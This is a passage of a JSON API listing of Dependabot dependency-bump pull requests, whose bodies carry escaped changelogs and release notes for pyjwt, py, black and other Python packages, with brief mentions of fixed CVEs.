\u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/744\"\u003ejpadilla/pyjwt#744\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate CHANGELOG.rst by \u003ca href=\"https://github.com/hipertracker\"\u003e\u003ccode\u003e@​hipertracker\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/751\"\u003ejpadilla/pyjwt#751\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/699\"\u003ejpadilla/pyjwt#699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rekyungmin\"\u003e\u003ccode\u003e@​rekyungmin\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/705\"\u003ejpadilla/pyjwt#705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sseering\"\u003e\u003ccode\u003e@​sseering\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/661\"\u003ejpadilla/pyjwt#661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/estin\"\u003e\u003ccode\u003e@​estin\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/713\"\u003ejpadilla/pyjwt#713\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/woodruffw\"\u003e\u003ccode\u003e@​woodruffw\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/725\"\u003ejpadilla/pyjwt#725\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/guneybilen\"\u003e\u003ccode\u003e@​guneybilen\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/727\"\u003ejpadilla/pyjwt#727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dmahr1\"\u003e\u003ccode\u003e@​dmahr1\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/734\"\u003ejpadilla/pyjwt#734\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/israelabraham\"\u003e\u003ccode\u003e@​israelabraham\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/738\"\u003ejpadilla/pyjwt#738\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fviard\"\u003e\u003ccode\u003e@​fviard\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/723\"\u003ejpadilla/pyjwt#723\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/742\"\u003ejpadilla/pyjwt#742\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/hipertracker\"\u003e\u003ccode\u003e@​hipertracker\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/751\"\u003ejpadilla/pyjwt#751\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.3.0...2.4.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.3.0...2.4.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e2.3.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[pre-commit.ci] pre-commit autoupdate by \u003ca href=\"https://github.com/pre-commit-ci\"\u003e\u003ccode\u003e@​pre-commit-ci\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/700\"\u003ejpadilla/pyjwt#700\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd exception chaining by \u003ca href=\"https://github.com/ehdgua01\"\u003e\u003ccode\u003e@​ehdgua01\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/702\"\u003ejpadilla/pyjwt#702\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Remove arbitrary kwargs.\u0026quot; by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/701\"\u003ejpadilla/pyjwt#701\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.4.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.3.0...2.4.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- [CVE-2022-29217] Prevent key confusion through non-blocklisted public key formats. https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24\n\u003cp\u003eChanged\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Explicit check the key for ECAlgorithm by @estin in https://github.com/jpadilla/pyjwt/pull/713\n- Raise DeprecationWarning for jwt.decode(verify=...) by @akx in https://github.com/jpadilla/pyjwt/pull/742\n\nFixed\n~~~~~\n\n- Don't use implicit optionals by @rekyungmin in https://github.com/jpadilla/pyjwt/pull/705\n- documentation fix: show correct scope for decode_complete() by @sseering in https://github.com/jpadilla/pyjwt/pull/661\n- fix: Update copyright information by @kkirsche in https://github.com/jpadilla/pyjwt/pull/729\n- Don't mutate options dictionary in .decode_complete() by @akx in https://github.com/jpadilla/pyjwt/pull/743\n\nAdded\n~~~~~\n\n- Add support for Python 3.10 by @hugovk in https://github.com/jpadilla/pyjwt/pull/699\n- api_jwk: Add PyJWKSet.__getitem__ by @woodruffw in https://github.com/jpadilla/pyjwt/pull/725\n- Update usage.rst by @guneybilen in https://github.com/jpadilla/pyjwt/pull/727\n- Docs: mention performance reasons for reusing RSAPrivateKey when encoding by @dmahr1 in https://github.com/jpadilla/pyjwt/pull/734\n- Fixed typo in usage.rst by @israelabraham in https://github.com/jpadilla/pyjwt/pull/738\n- Add detached payload support for JWS encoding and decoding by @fviard in https://github.com/jpadilla/pyjwt/pull/723\n- Replace various string interpolations with f-strings by @akx in https://github.com/jpadilla/pyjwt/pull/744\n- Update CHANGELOG.rst by @hipertracker in https://github.com/jpadilla/pyjwt/pull/751\n\n`v2.3.0 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.2.0...2.3.0\u0026amp;gt;`__\n-----------------------------------------------------------------------\n\nFixed\n~~~~~\n\n- Revert \u0026amp;quot;Remove arbitrary kwargs.\u0026amp;quot; `[#701](https://github.com/jpadilla/pyjwt/issues/701) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/701\u0026amp;gt;`__\n\nAdded\n~~~~~\n\n- Add exception chaining `[#702](https://github.com/jpadilla/pyjwt/issues/702) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/702\u0026amp;gt;`__\n\n`v2.2.0 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.1.0...2.2.0\u0026amp;gt;`__\n-----------------------------------------------------------------------\n\n\u0026amp;lt;/tr\u0026amp;gt;\u0026amp;lt;/table\u0026amp;gt; \n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/83ff831a4d11190e3a0bed781da43f8d84352653\u0026quot;\u0026gt;\u0026lt;code\u0026gt;83ff831\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; chore: update changelog\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/4c1ce8fd9019dd312ff257b5141cdb6d897379d9\u0026quot;\u0026gt;\u0026lt;code\u0026gt;4c1ce8f\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; chore: update changelog\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/96f3f0275745c5a455c019a0d3476a054980e8ea\u0026quot;\u0026gt;\u0026lt;code\u0026gt;96f3f02\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; fix: failing advisory test\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc\u0026quot;\u0026gt;\u0026lt;code\u0026gt;9c52867\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request from GHSA-ffqj-6fqr-9h24\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/24b29adfebcb4f057a3cef5aaf35653bc0c1c8cc\u0026quot;\u0026gt;\u0026lt;code\u0026gt;24b29ad\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Update CHANGELOG.rst (\u0026lt;a href=\u0026quot;https://redirect.github.com/jpadilla/pyjwt/issues/751\u0026quot;\u0026gt;#751\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/jpadilla/pyjwt/commit/31f5acb8fb3ec6cdfe2b1b0a4a8f329b5f3ca67f\u0026quot;\u0026gt;\u0026lt;code\u0026gt;31f5acb\u0026lt;/...\n\n_Description has been truncated_","html_url":"https://github.com/alfonsodg/pygmy/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/alfonsodg%2Fpygmy/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"},{"uuid":"2804728907","node_id":"PR_kwDOPjLKZ86nLMRL","number":1,"state":"open","title":"Bump py from 1.8.0 to 1.11.0 in /eval/latex2sympy","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-09-06T11:38:06.000Z","updated_at":"2025-09-06T11:38:06.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"py","old_version":"1.8.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"}],"path":"/eval/latex2sympy","ecosystem":"pip"},"body":"Bumps [py](https://github.com/pytest-dev/py) from 1.8.0 to 1.11.0.\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.8.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=py\u0026package-manager=pip\u0026previous-version=1.8.0\u0026new-version=1.11.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Sayanc93/latent-reasoner/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Sayanc93/latent-reasoner/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Sayanc93%2Flatent-reasoner/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"},{"uuid":"2787335412","node_id":"PR_kwDOE1q2p86mI1z0","number":1,"state":"open","title":"Bump the pip group across 1 directory with 16 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-08-31T04:08:20.000Z","updated_at":"2025-08-31T04:08:21.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":16,"packages":[{"name":"black","old_version":"19.10b0","new_version":"24.3.0","repository_url":"https://github.com/psf/black"},{"name":"bleach","old_version":"3.1.5","new_version":"3.3.0","repository_url":"https://github.com/mozilla/bleach"},{"name":"certifi","old_version":"2020.4.5.1","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"idna","old_version":"2.9","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"ipython","old_version":"7.15.0","new_version":"8.10.0","repository_url":"https://github.com/ipython/ipython"},{"name":"jinja2","old_version":"2.11.2","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"jupyter-core","old_version":"4.6.3","new_version":"4.11.2","repository_url":"https://github.com/jupyter/jupyter_core"},{"name":"nbconvert","old_version":"5.6.1","new_version":"6.5.1","repository_url":"https://github.com/jupyter/nbconvert"},{"name":"notebook","old_version":"6.0.3","new_version":"6.4.12","repository_url":"https://github.com/jupyter/notebook"},{"name":"numpy","old_version":"1.18.5","new_version":"1.22.0","repository_url":"https://github.com/numpy/numpy"},{"name":"py","old_version":"1.8.1","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.23.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"tornado","old_version":"6.0.4","new_version":"6.5","repository_url":"https://github.com/tornadoweb/tornado"},{"name":"tqdm","old_version":"4.46.1","new_version":"4.66.3","repository_url":"https://github.com/tqdm/tqdm"},{"name":"urllib3","old_version":"1.25.9","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"zipp","old_version":"3.1.0","new_version":"3.19.1","repository_url":"https://github.com/jaraco/zipp"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 16 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [black](https://github.com/psf/black) | `19.10b0` | `24.3.0` |\n| [bleach](https://github.com/mozilla/bleach) | `3.1.5` | `3.3.0` |\n| [certifi](https://github.com/certifi/python-certifi) | `2020.4.5.1` | `2024.7.4` |\n| [idna](https://github.com/kjd/idna) | `2.9` | `3.7` |\n| [ipython](https://github.com/ipython/ipython) | `7.15.0` | `8.10.0` |\n| [jinja2](https://github.com/pallets/jinja) | `2.11.2` | `3.1.6` |\n| [jupyter-core](https://github.com/jupyter/jupyter_core) | `4.6.3` | `4.11.2` |\n| [nbconvert](https://github.com/jupyter/nbconvert) | `5.6.1` | `6.5.1` |\n| [notebook](https://github.com/jupyter/notebook) | `6.0.3` | `6.4.12` |\n| [numpy](https://github.com/numpy/numpy) | `1.18.5` | `1.22.0` |\n| [py](https://github.com/pytest-dev/py) | `1.8.1` | `1.11.0` |\n| [requests](https://github.com/psf/requests) | `2.23.0` | `2.32.4` |\n| [tornado](https://github.com/tornadoweb/tornado) | `6.0.4` | `6.5` |\n| [tqdm](https://github.com/tqdm/tqdm) | `4.46.1` | `4.66.3` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.25.9` | `2.5.0` |\n| [zipp](https://github.com/jaraco/zipp) | `3.1.0` | `3.19.1` |\n\n\nUpdates `black` from 19.10b0 to 24.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/releases\"\u003eblack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e24.3.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cp\u003eThis release is a milestone: it fixes Black's first CVE security vulnerability. If you\nrun Black on untrusted input, or if you habitually put thousands of leading tab\ncharacters in your docstrings, you are strongly encouraged to upgrade immediately to fix\n\u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21503\"\u003eCVE-2024-21503\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eThis release also fixes a bug in Black's AST safety check that allowed Black to make\nincorrect changes to certain f-strings that are valid in Python 3.12 and higher.\u003c/p\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDon't move comments along with delimiters, which could cause crashes (\u003ca href=\"https://redirect.github.com/psf/black/issues/4248\"\u003e#4248\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eStrengthen AST safety check to catch more unsafe changes to strings. Previous versions\nof Black would incorrectly format the contents of certain unusual f-strings containing\nnested strings with the same quote type. Now, Black will crash on such strings until\nsupport for the new f-string syntax is implemented. (\u003ca href=\"https://redirect.github.com/psf/black/issues/4270\"\u003e#4270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix a bug where line-ranges exceeding the last code line would not work as expected\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4273\"\u003e#4273\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix catastrophic performance on docstrings that contain large numbers of leading tab\ncharacters. This fixes\n\u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21503\"\u003eCVE-2024-21503\u003c/a\u003e.\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4278\"\u003e#4278\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eNote what happens when \u003ccode\u003e--check\u003c/code\u003e is used with \u003ccode\u003e--quiet\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/psf/black/issues/4236\"\u003e#4236\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e24.2.0\u003c/h2\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug where comments where mistakenly removed along with redundant parentheses\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4218\"\u003e#4218\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMove the \u003ccode\u003ehug_parens_with_braces_and_square_brackets\u003c/code\u003e feature to the unstable style\ndue to an outstanding crash and proposed formatting tweaks (\u003ca href=\"https://redirect.github.com/psf/black/issues/4198\"\u003e#4198\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where base expressions caused inconsistent formatting of ** in tenary\nexpression (\u003ca href=\"https://redirect.github.com/psf/black/issues/4154\"\u003e#4154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChecking for newline before adding one on docstring that is almost at the line limit\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4185\"\u003e#4185\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove redundant parentheses in \u003ccode\u003ecase\u003c/code\u003e statement \u003ccode\u003eif\u003c/code\u003e guards (\u003ca href=\"https://redirect.github.com/psf/black/issues/4214\"\u003e#4214\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eConfiguration\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/blob/main/CHANGES.md\"\u003eblack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e24.3.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cp\u003eThis release is a milestone: it fixes Black's first CVE security vulnerability. If you\nrun Black on untrusted input, or if you habitually put thousands of leading tab\ncharacters in your docstrings, you are strongly encouraged to upgrade immediately to fix\n\u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21503\"\u003eCVE-2024-21503\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eThis release also fixes a bug in Black's AST safety check that allowed Black to make\nincorrect changes to certain f-strings that are valid in Python 3.12 and higher.\u003c/p\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDon't move comments along with delimiters, which could cause crashes (\u003ca href=\"https://redirect.github.com/psf/black/issues/4248\"\u003e#4248\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eStrengthen AST safety check to catch more 